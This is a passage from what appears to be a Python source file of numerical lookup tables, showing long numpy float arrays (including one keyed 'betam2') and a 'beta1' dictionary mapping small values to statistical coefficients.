0535,0.05375,0.054,0.05425,0.0545,0.05475,0.055,0.05525,0.0555,0.05575,0.056,0.05625,0.0565,0.05675,0.057,0.05725,0.0575,0.05775,0.058,0.05825,0.058499999999999996,0.05875,0.059,0.05933333333333333,0.059666666666666666,0.06,0.06025,0.0605,0.06075,0.061,0.06125,0.0615,0.06175,0.062,0.06225,0.0625,0.06275,0.063,0.06325,0.0635,0.06375,0.064,0.06425,0.0645,0.06475,0.065,0.06525,0.0655,0.06575,0.066,0.06633333333333334,0.06666666666666667,0.067,0.06725,0.0675,0.06775,0.068,0.06825,0.0685,0.06875,0.069,0.06925,0.0695,0.06975,0.07,0.07033333333333333,0.07066666666666667,0.071,0.07125,0.0715,0.07175,0.072,0.07225,0.0725,0.07275,0.073,0.07325,0.0735,0.07375,0.074,0.07433333333333333,0.07466666666666666,0.075,0.07525,0.0755,0.07575,0.076,0.07633333333333334,0.07666666666666666,0.077,0.07725,0.0775,0.07775,0.078,0.07825,0.0785,0.07875,0.079,0.07933333333333334,0.07966666666666666,0.08,0.08025,0.0805,0.08075,0.081,0.08133333333333334,0.08166666666666667,0.082,0.08225,0.0825,0.08275,0.083,0.08333333333333334,0.08366666666666667,0.084,0.08425,0.0845,0.08475,0.085,0.08533333333333333,0.08566666666666667,0.086,0.08625,0.0865,0.08675,0.087,0.08733333333333333,0.08766666666666666,0.088,0.08825,0.0885,0.08875,0.089,0.08933333333333333,0.08966666666666666,0.09,0.09025,0.0905,0.09075,0.091,0.09133333333333334,0.09166666666666666,0.092,0.09225,0.0925,0.09275,0.093,0.09333333333333334,0.09366666666666666,0.094,0.09433333333333334,0.09466666666666666,0.095,0.09525,0.0955,0.09575,0.096,0.09633333333333334,0.09666666666666666,0.097,0.09733333333333334,0.09766666666666667,0.098,0.09825,0.0985,0.09875,0.099,0.09933333333333334,0.09966666666666667,0.1,0.10033333333333334,0.10066666666666667,0.101,0.10133333333333333,0.10166666666666667,0.102,0.10225,0.1025,0.10275,0.103,0.10333333333333333,0.10366666666666666,0.104,0.10433333333333333,0.10466666666666666,0.105,0.10533333333333333,0.10566666666666666,0.106,0.10633333333333334,0.10666666666666666,0.107,0.10725,0.1075,0.10775,0.108,0.1083333333333
3334,0.10866666666666666,0.109,0.10933333333333334,0.10966666666666666,0.11,0.11033333333333334,0.11066666666666666,0.111,0.11133333333333334,0.11166666666666666,0.112,0.11233333333333334,0.11266666666666666,0.113,0.11333333333333334,0.11366666666666667,0.114,0.11433333333333334,0.11466666666666667,0.115,0.11533333333333334,0.11566666666666667,0.116,0.11625,0.1165,0.11675,0.117,0.11733333333333333,0.11766666666666667,0.118,0.11833333333333333,0.11866666666666666,0.119,0.11933333333333333,0.11966666666666666,0.12,0.12033333333333333,0.12066666666666666,0.121,0.12133333333333333,0.12166666666666666,0.122,0.12233333333333334,0.12266666666666666,0.123,0.1235,0.124,0.12433333333333334,0.12466666666666666,0.125,0.12533333333333332,0.12566666666666668,0.126,0.12633333333333333,0.12666666666666668,0.127,0.12733333333333333,0.12766666666666668,0.128,0.12833333333333333,0.12866666666666668,0.129,0.12933333333333333,0.12966666666666668,0.13,0.13033333333333333,0.13066666666666668,0.131,0.13133333333333333,0.13166666666666668,0.132,0.1325,0.133,0.13333333333333333,0.13366666666666668,0.134,0.13433333333333333,0.13466666666666668,0.135,0.13533333333333333,0.13566666666666669,0.136,0.13633333333333333,0.1366666666666667,0.137,0.1375,0.138,0.13833333333333334,0.1386666666666667,0.139,0.13933333333333334,0.1396666666666667,0.14,0.14033333333333334,0.14066666666666666,0.141,0.1415,0.142,0.1423333333333333,0.14266666666666666,0.143,0.1433333333333333,0.14366666666666666,0.144,0.1445,0.145,0.14533333333333331,0.14566666666666667,0.146,0.14633333333333332,0.14666666666666667,0.147,0.1475,0.148,0.14833333333333332,0.14866666666666667,0.149,0.14933333333333332,0.14966666666666667,0.15,0.1505,0.151,0.15133333333333332,0.15166666666666667,0.152,0.1525,0.153,0.15333333333333332,0.15366666666666667,0.154,0.1545,0.155,0.15533333333333332,0.15566666666666668,0.156,0.15633333333333332,0.15666666666666668,0.157,0.1575,0.158,0.15833333333333333,0.15866666666666668,0.159,0.1595,0.16,0.160333333333
33333,0.16066666666666668,0.161,0.1615,0.162,0.16233333333333333,0.16266666666666668,0.163,0.1635,0.164,0.1645,0.165,0.16533333333333333,0.16566666666666668,0.166,0.1665,0.167,0.16733333333333333,0.16766666666666669,0.168,0.1685,0.169,0.1695,0.17,0.17033333333333334,0.1706666666666667,0.171,0.17149999999999999,0.172,0.1725,0.173,0.1733333333333333,0.17366666666666666,0.174,0.1745,0.175,0.1755,0.176,0.17633333333333331,0.17666666666666667,0.177,0.1775,0.178,0.1785,0.179,0.17933333333333332,0.17966666666666667,0.18,0.1805,0.181,0.1815,0.182,0.1825,0.183,0.18333333333333332,0.18366666666666667,0.184,0.1845,0.185,0.1855,0.186,0.1865,0.187,0.1875,0.188,0.1885,0.189,0.18933333333333333,0.18966666666666668,0.19,0.1905,0.191,0.1915,0.192,0.1925,0.193,0.1935,0.194,0.1945,0.195,0.1955,0.196,0.1965,0.197,0.1975,0.198,0.19833333333333333,0.19866666666666669,0.199,0.1995,0.2,0.2005,0.201,0.2015,0.202,0.2025,0.203,0.20350000000000001,0.204,0.2045,0.205,0.2055,0.206,0.2065,0.207,0.2075,0.208,0.2085,0.209,0.2095,0.21,0.2105,0.211,0.212,0.2125,0.213,0.2135,0.214,0.2145,0.215,0.2155,0.216,0.2165,0.217,0.2175,0.218,0.2185,0.219,0.2195,0.22,0.221,0.2215,0.222,0.2225,0.223,0.2235,0.224,0.2245,0.225,0.2255,0.226,0.227,0.2275,0.228,0.2285,0.229,0.2295,0.23,0.231,0.2315,0.232,0.2325,0.233,0.2335,0.234,0.235,0.2355,0.236,0.2365,0.237,0.238,0.2385,0.239,0.2395,0.24,0.241,0.2415,0.242,0.2425,0.243,0.244,0.2445,0.245,0.2455,0.246,0.247,0.2475,0.248,0.249,0.2495,0.25,0.2505,0.251,0.252,0.2525,0.253,0.254,0.2545,0.255,0.256,0.2565,0.257,0.258,0.2585,0.259,0.26,0.2605,0.261,0.262,0.2625,0.263,0.264,0.2645,0.265,0.266,0.2665,0.267,0.268,0.2685,0.269,0.27,0.271,0.2715,0.272,0.273,0.2735,0.274,0.275,0.276,0.2765,0.277,0.278,0.279,0.2795,0.28,0.281,0.282,0.2825,0.283,0.284,0.285,0.2855,0.286,0.287,0.288,0.2885,0.289,0.29,0.291,0.292,0.2925,0.293,0.294,0.295,0.296,0.2965,0.297,0.298,0.299,0.3,0.301,0.3015,0.302,0.303,0.304,0.305,0.306,0.307,0.3075,0.308,0.309,0.31,0.311,0.312,0.313,0.314,0.3145,0.315,
0.316,0.317,0.318,0.319,0.32,0.321,0.322,0.323,0.324,0.325,0.326,0.327,0.328,0.329,0.33,0.331,0.332,0.333,0.334,0.335,0.336,0.337,0.338,0.339,0.34,0.341,0.342,0.343,0.344,0.345,0.346,0.347,0.349,0.35,0.351,0.352,0.353,0.354,0.355,0.357,0.358,0.359,0.36,0.361,0.363,0.364,0.365,0.366,0.367,0.369,0.37,0.371,0.373,0.374,0.375,0.376,0.378,0.379,0.381,0.382,0.383,0.385,0.386,0.387,0.389,0.39,0.392,0.393,0.395,0.396,0.398,0.399,0.401,0.402,0.404,0.406,0.407,0.409,0.411,0.412,0.414,0.416,0.417,0.419,0.421,0.423,0.424,0.426,0.428,0.43,0.432,0.434,0.436,0.438,0.44,0.442,0.444,0.446,0.448,0.45,0.453,0.455,0.457,0.46,0.462,0.464,0.467,0.469,0.472,0.474,0.477,0.48,0.483,0.485,0.488,0.491,0.494,0.497,0.501,0.504,0.507,0.511,0.514,0.518,0.522,0.525,0.529,0.534,0.538,0.542,0.547,0.552,0.557,0.562,0.568,0.574,0.58,0.587,0.594,0.602,0.61,0.619,0.629,0.64,0.653,0.668,0.687,0.711,0.749,0.999]), # skipcq: FLK-E231, FLK-E501 'betam2': np.array([0.251,0.288,0.313,0.331,0.346,0.359,0.371,0.381,0.39,0.398,0.406,0.413,0.419,0.426,0.432,0.437,0.442,0.448,0.452,0.457,0.462,0.466,0.47,0.474,0.478,0.482,0.485,0.489,0.492,0.496,0.499,0.502,0.505,0.508,0.511,0.514,0.517,0.52,0.522,0.525,0.528,0.53,0.533,0.535,0.538,0.54,0.542,0.545,0.547,0.549,0.551,0.553,0.555,0.558,0.56,0.562,0.564,0.566,0.567,0.569,0.571,0.573,0.575,0.577,0.579,0.58,0.582,0.584,0.586,0.587,0.589,0.591,0.592,0.594,0.595,0.597,0.599,0.6,0.602,0.603,0.605,0.606,0.608,0.609,0.61,0.612,0.613,0.615,0.616,0.617,0.619,0.62,0.622,0.623,0.624,0.626,0.627,0.628,0.629,0.631,0.632,0.633,0.634,0.636,0.637,0.638,0.639,0.64,0.642,0.643,0.644,0.645,0.646,0.647,0.649,0.65,0.651,0.652,0.653,0.654,0.655,0.656,0.657,0.658,0.659,0.66,0.662,0.663,0.664,0.665,0.666,0.667,0.668,0.669,0.67,0.671,0.672,0.673,0.674,0.675,0.676,0.6765000000000001,0.677,0.678,0.679,0.68,0.681,0.682,0.683,0.684,0.685,0.686,0.687,0.688,0.6884999999999999,0.689,0.69,0.691,0.692,0.693,0.694,0.695,0.6955,0.696,0.697,0.698,0.699,0.7,0.7004999999999999,0.701,0.702,0.703,0.704,0.70
5,0.7055,0.706,0.707,0.708,0.709,0.7095,0.71,0.711,0.712,0.7124999999999999,0.713,0.714,0.715,0.716,0.7164999999999999,0.717,0.718,0.719,0.7195,0.72,0.721,0.7215,0.722,0.723,0.724,0.7244999999999999,0.725,0.726,0.727,0.7275,0.728,0.729,0.7295,0.73,0.731,0.732,0.7324999999999999,0.733,0.734,0.7344999999999999,0.735,0.736,0.7364999999999999,0.737,0.738,0.7384999999999999,0.739,0.74,0.7404999999999999,0.741,0.742,0.7424999999999999,0.743,0.744,0.7444999999999999,0.745,0.746,0.7464999999999999,0.747,0.748,0.7484999999999999,0.749,0.7495,0.75,0.751,0.7515000000000001,0.752,0.753,0.7535000000000001,0.754,0.7545,0.755,0.756,0.7565,0.757,0.7575000000000001,0.758,0.759,0.7595000000000001,0.76,0.7605,0.761,0.762,0.7625,0.763,0.7635000000000001,0.764,0.765,0.7655000000000001,0.766,0.7665,0.767,0.768,0.7685,0.769,0.7695000000000001,0.77,0.7705,0.771,0.7715000000000001,0.772,0.773,0.7735000000000001,0.774,0.7745,0.775,0.7755000000000001,0.776,0.7765,0.777,0.778,0.7785,0.779,0.7795000000000001,0.78,0.7805,0.781,0.7815000000000001,0.782,0.7825,0.783,0.784,0.7845,0.785,0.7855000000000001,0.786,0.7865,0.787,0.7875000000000001,0.788,0.7885,0.789,0.7895000000000001,0.79,0.7905,0.791,0.7915000000000001,0.792,0.7925,0.793,0.7935000000000001,0.794,0.7945,0.795,0.7955000000000001,0.796,0.7965,0.797,0.7975000000000001,0.798,0.7985,0.799,0.7995000000000001,0.8,0.8005,0.801,0.8015000000000001,0.802,0.8025,0.803,0.8035000000000001,0.804,0.8045,0.805,0.8055000000000001,0.806,0.8063333333333333,0.8066666666666668,0.807,0.8075000000000001,0.808,0.8085,0.809,0.8095000000000001,0.81,0.8105,0.811,0.8115000000000001,0.812,0.8125,0.813,0.8133333333333332,0.8136666666666666,0.814,0.8145,0.815,0.8154999999999999,0.816,0.8165,0.817,0.8173333333333332,0.8176666666666667,0.818,0.8185,0.819,0.8194999999999999,0.82,0.8205,0.821,0.8213333333333332,0.8216666666666667,0.822,0.8225,0.823,0.8234999999999999,0.824,0.8245,0.825,0.8253333333333333,0.8256666666666667,0.826,0.8265,0.827,0.8274999999999999,0.828,0.828
3333333333333,0.8286666666666667,0.829,0.8294999999999999,0.83,0.8303333333333333,0.8306666666666667,0.831,0.8314999999999999,0.832,0.8325,0.833,0.8333333333333333,0.8336666666666667,0.834,0.8345,0.835,0.8353333333333333,0.8356666666666667,0.836,0.8365,0.837,0.8373333333333333,0.8376666666666667,0.838,0.8385,0.839,0.8393333333333333,0.8396666666666667,0.84,0.8405,0.841,0.8413333333333333,0.8416666666666667,0.842,0.8425,0.843,0.8433333333333333,0.8436666666666667,0.844,0.8445,0.845,0.8453333333333333,0.8456666666666667,0.846,0.8465,0.847,0.8473333333333333,0.8476666666666667,0.848,0.8485,0.849,0.8493333333333333,0.8496666666666667,0.85,0.8503333333333333,0.8506666666666667,0.851,0.8514999999999999,0.852,0.8523333333333333,0.8526666666666667,0.853,0.8533333333333333,0.8536666666666667,0.854,0.8545,0.855,0.8553333333333333,0.8556666666666667,0.856,0.8563333333333333,0.8566666666666667,0.857,0.8574999999999999,0.858,0.8583333333333333,0.8586666666666667,0.859,0.8593333333333333,0.8596666666666667,0.86,0.8605,0.861,0.8613333333333333,0.8616666666666667,0.862,0.8623333333333333,0.8626666666666667,0.863,0.8633333333333333,0.8636666666666667,0.864,0.8643333333333333,0.8646666666666667,0.865,0.8654999999999999,0.866,0.8663333333333333,0.8666666666666667,0.867,0.8673333333333333,0.8676666666666667,0.868,0.8683333333333333,0.8686666666666667,0.869,0.8693333333333333,0.8696666666666667,0.87,0.8703333333333333,0.8706666666666667,0.871,0.8714999999999999,0.872,0.8723333333333333,0.8726666666666667,0.873,0.8733333333333333,0.8736666666666667,0.874,0.8743333333333333,0.8746666666666667,0.875,0.8753333333333333,0.8756666666666667,0.876,0.8763333333333333,0.8766666666666667,0.877,0.8773333333333333,0.8776666666666667,0.878,0.8783333333333333,0.8786666666666667,0.879,0.8793333333333333,0.8796666666666667,0.88,0.8803333333333333,0.8806666666666667,0.881,0.8813333333333333,0.8816666666666667,0.882,0.8823333333333333,0.8826666666666667,0.883,0.8833333333333333,0.8836666666666667,0.884,0.
8843333333333333,0.8846666666666667,0.885,0.8853333333333333,0.8856666666666667,0.886,0.8863333333333333,0.8866666666666667,0.887,0.8873333333333333,0.8876666666666667,0.888,0.88825,0.8885000000000001,0.88875,0.889,0.8893333333333333,0.8896666666666667,0.89,0.8903333333333333,0.8906666666666667,0.891,0.8913333333333333,0.8916666666666667,0.892,0.8923333333333333,0.8926666666666667,0.893,0.8933333333333333,0.8936666666666667,0.894,0.89425,0.8945000000000001,0.89475,0.895,0.8953333333333333,0.8956666666666667,0.896,0.8963333333333333,0.8966666666666667,0.897,0.8973333333333333,0.8976666666666667,0.898,0.89825,0.8985000000000001,0.89875,0.899,0.8993333333333333,0.8996666666666667,0.9,0.9003333333333333,0.9006666666666667,0.901,0.9013333333333333,0.9016666666666667,0.902,0.90225,0.9025000000000001,0.90275,0.903,0.9033333333333333,0.9036666666666667,0.904,0.9043333333333333,0.9046666666666667,0.905,0.90525,0.9055,0.90575,0.906,0.9063333333333333,0.9066666666666667,0.907,0.90725,0.9075,0.9077500000000001,0.908,0.9083333333333333,0.9086666666666667,0.909,0.9093333333333333,0.9096666666666667,0.91,0.91025,0.9105000000000001,0.9107500000000001,0.911,0.9113333333333333,0.9116666666666667,0.912,0.91225,0.9125000000000001,0.9127500000000001,0.913,0.9133333333333333,0.9136666666666667,0.914,0.91425,0.9145000000000001,0.9147500000000001,0.915,0.9153333333333333,0.9156666666666667,0.916,0.91625,0.9165000000000001,0.9167500000000001,0.917,0.9173333333333333,0.9176666666666667,0.918,0.91825,0.9185000000000001,0.9187500000000001,0.919,0.9193333333333333,0.9196666666666667,0.92,0.92025,0.9205000000000001,0.9207500000000001,0.921,0.92125,0.9215,0.9217500000000001,0.922,0.9223333333333333,0.9226666666666667,0.923,0.92325,0.9235,0.9237500000000001,0.924,0.92425,0.9245000000000001,0.9247500000000001,0.925,0.9253333333333333,0.9256666666666667,0.926,0.92625,0.9265000000000001,0.9267500000000001,0.927,0.92725,0.9275,0.9277500000000001,0.928,0.9283333333333333,0.9286666666666668,0.929,0.9292
5,0.9295,0.9297500000000001,0.93,0.93025,0.9305000000000001,0.9307500000000001,0.931,0.93125,0.9315,0.9317500000000001,0.932,0.9323333333333333,0.9326666666666668,0.933,0.93325,0.9335,0.9337500000000001,0.934,0.93425,0.9345000000000001,0.9347500000000001,0.935,0.93525,0.9355,0.9357500000000001,0.936,0.93625,0.9365000000000001,0.9367500000000001,0.937,0.93725,0.9375,0.93775,0.938,0.9383333333333332,0.9386666666666666,0.939,0.9392499999999999,0.9395,0.93975,0.94,0.9402499999999999,0.9404999999999999,0.94075,0.941,0.9412499999999999,0.9415,0.94175,0.942,0.9422499999999999,0.9424999999999999,0.94275,0.943,0.9432499999999999,0.9435,0.94375,0.944,0.9442499999999999,0.9444999999999999,0.94475,0.945,0.9452499999999999,0.9455,0.94575,0.946,0.9462499999999999,0.9464999999999999,0.94675,0.947,0.9472499999999999,0.9475,0.94775,0.948,0.9482499999999999,0.9484999999999999,0.94875,0.949,0.9492499999999999,0.9495,0.94975,0.95,0.9502499999999999,0.9504999999999999,0.95075,0.951,0.9512499999999999,0.9515,0.95175,0.952,0.9522499999999999,0.9524999999999999,0.95275,0.953,0.9531999999999999,0.9533999999999999,0.9536,0.9538,0.954,0.9542499999999999,0.9544999999999999,0.95475,0.955,0.9552499999999999,0.9555,0.95575,0.956,0.9562499999999999,0.9564999999999999,0.95675,0.957,0.9572499999999999,0.9575,0.95775,0.958,0.9581999999999999,0.9583999999999999,0.9586,0.9588,0.959,0.9592499999999999,0.9595,0.95975,0.96,0.9602499999999999,0.9604999999999999,0.96075,0.961,0.9612499999999999,0.9615,0.96175,0.962,0.9621999999999999,0.9623999999999999,0.9626,0.9628,0.963,0.9632499999999999,0.9635,0.96375,0.964,0.9642499999999999,0.9644999999999999,0.96475,0.965,0.9652,0.9653999999999999,0.9656,0.9658,0.966,0.9662499999999999,0.9664999999999999,0.96675,0.967,0.9672499999999999,0.9675,0.96775,0.968,0.9682,0.9683999999999999,0.9686,0.9688,0.969,0.96925,0.9695,0.96975,0.97,0.9702,0.9703999999999999,0.9706,0.9708,0.971,0.97125,0.9715,0.97175,0.972,0.9722,0.9723999999999999,0.9726,0.9728,0.973,0.97325,0.9735,0.9
7375,0.974,0.9742,0.9743999999999999,0.9746,0.9748,0.975,0.97525,0.9755,0.97575,0.976,0.9762,0.9763999999999999,0.9766,0.9768,0.977,0.97725,0.9775,0.97775,0.978,0.9782,0.9783999999999999,0.9786,0.9788,0.979,0.97925,0.9795,0.97975,0.98,0.9802,0.9803999999999999,0.9806,0.9808,0.981,0.9812,0.9813999999999999,0.9816,0.9818,0.982,0.98225,0.9824999999999999,0.98275,0.983,0.9832,0.9833999999999999,0.9836,0.9838,0.984,0.9842,0.9843999999999999,0.9846,0.9848,0.985,0.98525,0.9855,0.98575,0.986,0.9862,0.9863999999999999,0.9866,0.9868,0.987,0.9872,0.9873999999999999,0.9876,0.9878,0.988,0.9882,0.9884,0.9886,0.9888,0.989,0.98925,0.9895,0.98975,0.99,0.9902,0.9904,0.9906,0.9908,0.991,0.9912,0.9914,0.9916,0.9918,0.992,0.9922,0.9924,0.9926,0.9928,0.993,0.9932,0.9934,0.9936,0.9938,0.994,0.9942,0.9944,0.9946,0.9948,0.995,0.9952,0.9954,0.9956,0.9958,0.996,0.9962,0.9964,0.9966,0.9968,0.997,0.9972,0.9974,0.9976,0.9978,0.998,0.9982,0.9984,0.9986,0.9988,0.999,0.999,0.999,0.999,0.999]), # skipcq: FLK-E231, FLK-E501 'beta1': {0.001: 0.00000319442756483, 0.002: 0.000011317463697, 0.003: 0.00002437224702, 0.004: 0.0000423586850569, 0.005: 0.0000652765986715, 0.006: 0.000093125769818, 0.007: 0.00012590591620148937, 0.008: 0.000163616721998012, 0.009: 0.0002062578100772347, 0.01: 0.0002538287583069279, 0.011: 0.000306329099853549, 0.012: 0.0003637583165964183, 0.013: 0.00042611584087932117, 0.014: 0.0004934010586615567, 0.015: 0.0005656133072855606, 0.016: 0.0006427518732867943, 0.017: 0.0007248159948162249, 0.018: 0.0008118048635664835, 0.019: 0.000903717621891434, 0.02: 0.001000553362565144, 0.021: 0.0011023111298422304, 0.022: 0.0012089899209829437, 0.023: 0.0013205886834092976, 0.024: 0.0014371063162054868, 0.025: 0.0015585416705288157, 0.026: 0.0016848935476064277, 0.027: 0.0018161607022541798, 0.028: 0.0019523418388866748, 0.029: 0.0020934356144756165, 0.03: 0.0022394406373552373, 0.031: 0.0023903554673226357, 0.032: 0.002546178615709405, 0.033: 0.0027069085455906938, 0.034: 
0.002872543671793369, 0.035: 0.003043082360056609, 0.036: 0.0032185229285702534, 0.037: 0.0033988636467273906, 0.038: 0.003584102735485491, 0.039: 0.0037742383681569234, 0.04: 0.0039692686688357764, 0.041: 0.004169191713873449, 0.042: 0.004374005531412682, 0.043: 0.004583708101164634, 0.044: 0.004798297354602275, 0.045: 0.0050177711752145615, 0.046: 0.005242127397945962, 0.047: 0.005471363809906498, 0.048: 0.005705478149896408, 0.049: 0.005944468108748165, 0.05: 0.006188331329046212, 0.051: 0.006437065405400269, 0.052: 0.006690667884335984, 0.053: 0.006949136264386165, 0.054: 0.007212467996054513, 0.055: 0.0074806604819125325, 0.056: 0.007753711076500667, 0.057: 0.008031617086616195, 0.058: 0.008314375770990291, 0.059: 0.008601984340523077, 0.06: 0.00889443995837608, 0.061: 0.009191739739750827, 0.062: 0.009493880752152703, 0.063: 0.009800860015391079, 0.064: 0.010112674501407464, 0.065: 0.010429321134569111, 0.066: 0.010750796791506579, 0.067: 0.011077098301304688, 0.068: 0.011408222445400728, 0.069: 0.011744165957592563, 0.07: 0.012084925524209297, 0.071: 0.012430497784060565, 0.072: 0.012780879328580696, 0.073: 0.01313606670159937, 0.074: 0.01349605639963192, 0.075: 0.013860844871816616, 0.076: 0.014230428519951752, 0.077: 0.014604803698527647, 0.078: 0.014983966714864808, 0.079: 0.015367913828869609, 0.08: 0.015756641253450998, 0.081: 0.016150145154226952, 0.082: 0.0165484216497625, 0.083: 0.01695146681157209, 0.084: 0.01735927666406806, 0.085: 0.017771847184727605, 0.086: 0.018189174304006774, 0.087: 0.0186112539055101, 0.088: 0.019038081825895253, 0.089: 0.0194696538550656, 0.09: 0.01990596573604259, 0.091: 0.02034701316514059, 0.092: 0.020792791791978432, 0.093: 0.0212432972194774, 0.094: 0.021698525003969734, 0.095: 0.022158470655141968, 0.096: 0.02262312963619951, 0.097: 0.023092497363824387, 0.098: 0.02356656920832857, 0.099: 0.024045340493509006, 0.1: 0.024528806496860827, 0.101: 0.02501696244963071, 0.102: 0.025509803536677367, 0.103: 
0.02600732489678805, 0.104: 0.02650952162246471, 0.105: 0.027016388760153814, 0.106: 0.02752792131023947, 0.107: 0.028044114227047643, 0.108: 0.028564962418981356, 0.109: 0.02909046074847784, 0.11: 0.02962060403212325, 0.111: 0.030155387040732673, 0.112: 0.030694804499282566, 0.113: 0.031238851087102927, 0.114: 0.03178752143778703, 0.115: 0.03234081013938614, 0.116: 0.03289871173438084, 0.117: 0.03346122071974054, 0.118: 0.034028331546989775, 0.119: 0.034600038622262325, 0.12: 0.03517633630635684, 0.121: 0.03575721891478989, 0.122: 0.03634268071786485, 0.123: 0.03693271594069995, 0.124: 0.037527318763313854, 0.125: 0.038126483320662014, 0.126: 0.03873020370270661, 0.127: 0.03933847395449336, 0.128: 0.039951288076140665, 0.129: 0.04056864002300359, 0.13: 0.041190523705625356, 0.131: 0.041816932989891205, 0.132: 0.04244786169702028, 0.133: 0.04308330360365301, 0.134: 0.04372325244195518, 0.135: 0.0443677018995566, 0.136: 0.04501664561978973, 0.137: 0.04567007720156599, 0.138: 0.04632799019958714, 0.139: 0.046990378124343715, 0.14: 0.04765723444216695, 0.141: 0.0483285525753247, 0.142: 0.049004325902069476, 0.143: 0.049684547756723464, 0.144: 0.05036921142970255, 0.145: 0.051058310167641355, 0.146: 0.05175183717341257, 0.147: 0.052449785606189916, 0.148: 0.05315214858157764, 0.149: 0.05385891917159001, 0.15: 0.054570090404798384, 0.151: 0.05528565526636637, 0.152: 0.05600560669808361, 0.153: 0.056729937598526965, 0.154: 0.05745864082302535, 0.155: 0.05819170918379992, 0.156: 0.05892913545003413, 0.157: 0.05967091234788417, 0.158: 0.060417032560635756, 0.159: 0.06116748872869495, 0.16: 0.06192227344973335, 0.161: 0.06268137927869694, 0.162: 0.06344479872792343, 0.163: 0.06421252426721585, 0.164: 0.06498454832387214, 0.165: 0.06576086328280793, 0.166: 0.06654146148661619, 0.167: 0.06732633523563517, 0.168: 0.06811547678803058, 0.169: 0.0689088783598769, 0.17: 0.06970653212522365, 0.171: 0.07050843021617553, 0.172: 0.07131456472297787, 0.173: 0.07212492769408313, 0.174: 
0.07293951113623787, 0.175: 0.07375830701456244, 0.176: 0.07458130725262246, 0.177: 0.07540850373251008, 0.178: 0.0762398882949351, 0.179: 0.07707545273928854, 0.18: 0.07791518882372675, 0.181: 0.07875908826527792, 0.182: 0.07960714273989093, 0.183: 0.08045934388252407, 0.184: 0.08131568328724223, 0.185: 0.08217615250729793, 0.186: 0.0830407430551911, 0.187: 0.08390944640278333, 0.188: 0.0847822539813623, 0.189: 0.08565915718173367, 0.19: 0.08654014735430549, 0.191: 0.08742521580917012, 0.192: 0.08831435381620054, 0.193: 0.08920755260511812, 0.194: 0.09010480336558876, 0.195: 0.0910060972473264, 0.196: 0.09191142536015391, 0.197: 0.09282077877409256, 0.198: 0.09373414851947465, 0.199: 0.09465152558700353, 0.2: 0.09557290092786028, 0.201: 0.09649826545380326, 0.202: 0.09742761003720588, 0.203: 0.09836092551122107, 0.204: 0.09929820266980503, 0.205: 0.10023943226786301, 0.206: 0.10118460502128393, 0.207: 0.10213371160709263, 0.208: 0.10308674266349475, 0.209: 0.10404368878997927, 0.21: 0.10500454054743683, 0.211: 0.10596928845821446, 0.212: 0.10693792300624841, 0.213: 0.10791043463711919, 0.214: 0.10888681375817334, 0.215: 0.10986705073861491, 0.216: 0.11085113590957893, 0.217: 0.11183905956425746, 0.218: 0.11283081195797032, 0.219: 0.11382638330828407, 0.22: 0.11482576379508422, 0.221: 0.11582894356068629, 0.222: 0.11683591270992946, 0.223: 0.11784666131028751, 0.224: 0.1188611793919315, 0.225: 0.11987945694787307, 0.226: 0.12090148393402742, 0.227: 0.12192725026933787, 0.228: 0.12295674583585153, 0.229: 0.12398996047883411, 0.23: 0.125026884006872, 0.231: 0.12606750619196658, 0.232: 0.12711181676963323, 0.233: 0.12815980543900615, 0.234: 0.12921146186294907, 0.235: 0.1302667756681294, 0.236: 0.13132573644515383, 0.237: 0.13238833374864933, 0.238: 0.13345455709737608, 0.239: 0.13452439597432544, 0.24: 0.1355978398268364, 0.241: 0.13667487806666417, 0.242: 0.13775550007013634, 0.243: 0.1388396951782204, 0.244: 0.13992745269663925, 0.245: 0.1410187618959683, 0.246: 
0.14211361201176276, 0.247: 0.14321199224465206, 0.248: 0.14431389176043544, 0.249: 0.14541929969020284, 0.25: 0.1465282051304419, 0.251: 0.14764059714313438, 0.252: 0.14875646475587598, 0.253: 0.14987579696197337, 0.254: 0.15099858272057623, 0.255: 0.15212481095674632, 0.256: 0.15325447056160868, 0.257: 0.1543875503924239, 0.258: 0.1555240392727349, 0.259: 0.1566639259924429, 0.26: 0.15780719930794154, 0.261: 0.15895384794222778, 0.262: 0.1601038605849814, 0.263: 0.1612572258927219, 0.264: 0.162413932488892, 0.265: 0.16357396896397502, 0.266: 0.16473732387561, 0.267: 0.16590398574870388, 0.268: 0.16707394307554502, 0.269: 0.168247184315915, 0.27: 0.16942369789720155, 0.271: 0.17060347221452565, 0.272: 0.17178649563082535, 0.273: 0.1729727564770086, 0.274: 0.17416224305204242, 0.275: 0.17535494362307535, 0.276: 0.1765508464255532, 0.277: 0.1777499396633379, 0.278: 0.17895221150881968, 0.279: 0.18015765010303586, 0.28: 0.1813662435557958, 0.281: 0.18257797994577735, 0.282: 0.18379284732066176, 0.283: 0.1850108336972498, 0.284: 0.18623192706156758, 0.285: 0.18745611536901166, 0.286: 0.18868338654443928, 0.287: 0.18991372848229773, 0.288: 0.19114712904674702, 0.289: 0.19238357607177733, 0.29: 0.1936230573613347, 0.291: 0.1948655606894299, 0.292: 0.19611107380026316, 0.293: 0.19735958440834733, 0.294: 0.198611080198637, 0.295: 0.19986554882663596, 0.296: 0.20112297791851938, 0.297: 0.20238335507126698, 0.298: 0.2036466678527809, 0.299: 0.2049129038020017, 0.3: 0.20618205042904286, 0.301: 0.20745409521529598, 0.302: 0.2087290256135832, 0.303: 0.2100068290482507, 0.304: 0.21128749291530408, 0.305: 0.21257100458254238, 0.306: 0.2138573513896706, 0.307: 0.21514652064842565, 0.308: 0.21643849964271128, 0.309: 0.21773327562871456, 0.31: 0.21903083583502458, 0.311: 0.220331167462782, 0.312: 0.22163425768578188, 0.313: 0.22294009365060716, 0.314: 0.22424866247676634, 0.315: 0.22555995125679856, 0.316: 0.22687394705642888, 0.317: 0.22819063691467345, 0.318: 0.22951000784397224, 
